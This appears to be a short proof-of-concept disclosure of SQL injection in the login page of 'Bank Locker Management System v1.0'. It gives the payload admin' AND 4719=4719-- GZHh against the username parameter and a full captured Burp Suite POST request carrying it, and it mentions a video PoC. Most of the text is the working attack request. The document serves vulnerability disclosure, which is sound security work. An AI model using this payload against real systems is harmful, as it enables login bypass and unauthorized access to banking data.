Bank Locker Management System-v.1.0 POC
VENDOR-LOGIN-PAGE
VULNERABLE-PARAMETER: username
PAYLOAD USED : admin' AND 4719=4719-- GZHh
BURPSUITE: POST-REQUEST
POST / BLMS / banker / index . php HTTP / 1.1
Host: localhost
Content - Length : 60
Cache - Control : max - age = 0
sec - ch - ua : "Chromium" ; v = "109" , "Not_A Brand" ; v = "99"
sec - ch - ua - mobile : ?0
sec - ch - ua - platform : "Windows"
Upgrade - Insecure - Requests : 1
Origin: http://localhost
Content - Type : application / x - www - form - urlencoded
User - Agent : Mozilla / 5.0 ( Windows NT 10.0 ; Win64 ; x64 ) AppleWebKit / 537.36 ( KHTML , like Gecko ) Chrome / 109.0 .5414 .120 Safari / 537.36
Accept: text / html , application / xhtml + xml , application / xml ; q = 0.9 , image / avif , image / webp , image / apng , * / * ;q=0.8,application/ signed- exchange ; v = b3 ; q = 0.9
Sec - Fetch - Site : same - origin
Sec - Fetch - Mode : navigate
Sec - Fetch - User : ?1
Sec - Fetch - Dest : document
Referer: http://localhost/BLMS/banker/index.php
Accept - Encoding : gzip , deflate
Accept - Language : en - US , en ; q = 0.9
Cookie: PHPSESSID = 0 qu8r6atk2davkcc0gkm7a0e9p
Connection: close
username = admin % 27 + AND + 4719 % 3 D4719 -- + GZHh & inputpwd = ABC & login =
VIDEO-POC
POC-SQL-BLMS.mp4